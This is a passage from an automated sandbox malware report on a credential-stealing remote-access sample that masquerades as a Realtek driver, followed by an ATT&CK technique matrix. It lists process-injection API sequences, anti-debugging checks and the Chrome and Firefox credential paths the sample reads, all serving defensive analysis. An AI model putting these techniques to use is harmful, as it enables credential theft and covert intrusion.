                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DA503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_02DA503C
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DA4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02DA4A8A
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DA4BD8 SetUnhandledExceptionFilter,3_2_02DA4BD8
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DABB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02DABB71
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0306503C
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0306BB71
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03064BD8 SetUnhandledExceptionFilter,4_2_03064BD8
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03064A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_03064A8A
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0043503C
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00434A8A
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0043BB71
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_00434BD8 SetUnhandledExceptionFilter,5_2_00434BD8

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D8812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,3_2_02D8812A
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeSection loaded: NULL target: C:\Program Files (x86)\Internet Explorer\iexplore.exe protection: execute and read and writeJump to behavior
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 2BA3008Jump to behavior
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F56008Jump to behavior
                            Source: C:\Users\user\Desktop\1.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe0_2_00412132
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe3_2_02D82132
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe4_2_03042132
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe5_2_00412132
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00419662 mouse_event,0_2_00419662
                            Source: C:\Users\user\Desktop\1.exeProcess created: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe "C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "c:\program files (x86)\internet explorer\iexplore.exe"Jump to behavior
                            Source: iexplore.exe, 00000003.00000002.3265896381.000000000316F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager'
                            Source: iexplore.exe, 00000003.00000002.3265896381.000000000316F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                            Source: iexplore.exe, 00000003.00000002.3265896381.000000000316F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerj
                            Source: iexplore.exe, 00000003.00000002.3265896381.000000000316F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                            Source: iexplore.exe, 00000003.00000002.3265896381.000000000316F000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000003.00000002.3265896381.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000003.00000002.3265831941.00000000030BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00434CB6 cpuid 0_2_00434CB6
                            Source: C:\Users\user\Desktop\1.exeCode function: EnumSystemLocalesW,0_2_0045201B
                            Source: C:\Users\user\Desktop\1.exeCode function: EnumSystemLocalesW,0_2_004520B6
                            Source: C:\Users\user\Desktop\1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00452143
                            Source: C:\Users\user\Desktop\1.exeCode function: GetLocaleInfoW,0_2_00452393
                            Source: C:\Users\user\Desktop\1.exeCode function: EnumSystemLocalesW,0_2_00448484
                            Source: C:\Users\user\Desktop\1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004524BC
                            Source: C:\Users\user\Desktop\1.exeCode function: GetLocaleInfoW,0_2_004525C3
                            Source: C:\Users\user\Desktop\1.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00452690
                            Source: C:\Users\user\Desktop\1.exeCode function: GetLocaleInfoW,0_2_0044896D
                            Source: C:\Users\user\Desktop\1.exeCode function: GetLocaleInfoA,0_2_0040F90C
                            Source: C:\Users\user\Desktop\1.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00451D58
                            Source: C:\Users\user\Desktop\1.exeCode function: EnumSystemLocalesW,0_2_00451FD0
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoW,3_2_02DC2393
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: EnumSystemLocalesW,3_2_02DC20B6
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: EnumSystemLocalesW,3_2_02DC201B
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_02DC2143
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_02DC2690
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: EnumSystemLocalesW,3_2_02DB8484
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_02DC24BC
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoW,3_2_02DC25C3
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoW,3_2_02DB896D
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoA,3_2_02D7F90C
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: EnumSystemLocalesW,3_2_02DC1FD0
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_02DC1D58
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,4_2_03082393
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_03082143
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,4_2_0308201B
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,4_2_030820B6
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_03082690
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,4_2_030825C3
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,4_2_03078484
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_030824BC
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,4_2_0303F90C
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,4_2_0307896D
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,4_2_03081FD0
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_03081D58
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: EnumSystemLocalesW,5_2_0045201B
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: EnumSystemLocalesW,5_2_004520B6
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_00452143
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: GetLocaleInfoW,5_2_00452393
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: EnumSystemLocalesW,5_2_00448484
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_004524BC
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: GetLocaleInfoW,5_2_004525C3
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_00452690
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: GetLocaleInfoW,5_2_0044896D
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: GetLocaleInfoA,5_2_0040F90C
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_00451D58
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: EnumSystemLocalesW,5_2_00451FD0
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041A045 __EH_prolog,GdiplusStartup,CreateDirectoryW,Sleep,Sleep,GetLocalTime,Sleep,0_2_0041A045
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041B69E GetComputerNameExW,GetUserNameW,0_2_0041B69E
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00449210

                            Stealing of Sensitive Information

                            barindex
                            Source: Yara matchFile source: 1.exe, type: SAMPLE
                            Source: Yara matchFile source: 3.2.iexplore.exe.4ba0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.5e0620.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.svchost.exe.3030000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.4ba0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.2d70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.30e0ba0.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.1.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.1.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.5e0620.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.30e0ba0.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.svchost.exe.3030000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.2570000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.2570000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.2d70000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000008.00000000.2277687152.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2024293538.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000000.2195185970.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2196581789.0000000000697000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.2114588212.000000000055A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.2016191129.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.2114459695.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2278067341.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2278167412.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000000.2021874573.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3265970543.0000000004BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2196423426.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.2113169256.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3265805853.0000000003431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.2016636458.0000000000521000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3265768781.0000000003400000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2022398909.00000000004FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3265606404.0000000003030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2024405798.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2024631723.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3265831941.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 1.exe PID: 4956, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 6508, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: iexplore.exe PID: 3716, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3448, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 1352, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 4996, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 6552, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, type: DROPPED
                            Source: C:\Users\user\Desktop\1.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_0040BA4D
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data3_2_02D7BA4D
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data4_2_0303BA4D
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data5_2_0040BA4D
                            Source: C:\Users\user\Desktop\1.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\0_2_0040BB6B
                            Source: C:\Users\user\Desktop\1.exeCode function: \key3.db0_2_0040BB6B
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\3_2_02D7BB6B
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: \key3.db3_2_02D7BB6B
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\4_2_0303BB6B
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: \key3.db4_2_0303BB6B
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\5_2_0040BB6B
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: \key3.db5_2_0040BB6B

                            Remote Access Functionality

                            barindex
                            Source: Yara matchFile source: 1.exe, type: SAMPLE
                            Source: Yara matchFile source: 3.2.iexplore.exe.4ba0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.5e0620.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.svchost.exe.3030000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.4ba0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.2d70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.30e0ba0.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.1.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.1.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.5e0620.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.30e0ba0.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.svchost.exe.3030000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.2570000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.Realtek Driver.exe.2570000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.iexplore.exe.2d70000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000008.00000000.2277687152.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2024293538.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000000.2195185970.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2196581789.0000000000697000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.2114588212.000000000055A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.2016191129.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.2114459695.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2278067341.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2278167412.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000000.2021874573.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3265970543.0000000004BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2196423426.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.2113169256.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3265805853.0000000003431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.2016636458.0000000000521000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3265768781.0000000003400000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2022398909.00000000004FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3265606404.0000000003030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2024405798.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2024631723.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3265831941.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 1.exe PID: 4956, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 6508, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: iexplore.exe PID: 3716, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3448, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 1352, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 4996, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Realtek Driver.exe PID: 6552, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, type: DROPPED
                            Source: C:\Users\user\Desktop\1.exeCode function: cmd.exe0_2_0040569A
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: cmd.exe3_2_02D7569A
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: cmd.exe4_2_0303569A
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: cmd.exe5_2_0040569A
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                            Native API
                            1
                            DLL Side-Loading
                            1
                            DLL Side-Loading
                            1
                            Deobfuscate/Decode Files or Information
                            1
                            OS Credential Dumping
                            2
                            System Time Discovery
                            Remote Services11
                            Archive Collected Data
                            12
                            Ingress Tool Transfer
                            Exfiltration Over Other Network Medium1
                            System Shutdown/Reboot
                            CredentialsDomainsDefault Accounts1
                            Exploitation for Client Execution
                            1
                            Windows Service
                            1
                            Bypass User Account Control
                            2
                            Obfuscated Files or Information
                            111
                            Input Capture
                            1
                            Account Discovery
                            Remote Desktop Protocol111
                            Input Capture
                            2
                            Encrypted Channel
                            Exfiltration Over Bluetooth1
                            Defacement
                            Email AddressesDNS ServerDomain Accounts12
                            Command and Scripting Interpreter
                            11
                            Registry Run Keys / Startup Folder
                            1
                            Access Token Manipulation
                            1
                            DLL Side-Loading
                            2
                            Credentials In Files
                            1
                            System Service Discovery
                            SMB/Windows Admin Shares3
                            Clipboard Data
                            1
                            Non-Standard Port
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal Accounts2
                            Service Execution
                            Login Hook1
                            Windows Service
                            1
                            Bypass User Account Control
                            NTDS4
                            File and Directory Discovery
                            Distributed Component Object ModelInput Capture2
                            Non-Application Layer Protocol
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script322
                            Process Injection
                            1
                            Masquerading
                            LSA Secrets22
                            System Information Discovery
                            SSHKeylogging12
                            Application Layer Protocol
                            Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                            Registry Run Keys / Startup Folder
                            1
                            Access Token Manipulation
                            Cached Domain Credentials121
                            Security Software Discovery
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items322
                            Process Injection
                            DCSync3
                            Process Discovery
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                            System Owner/User Discovery
                            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
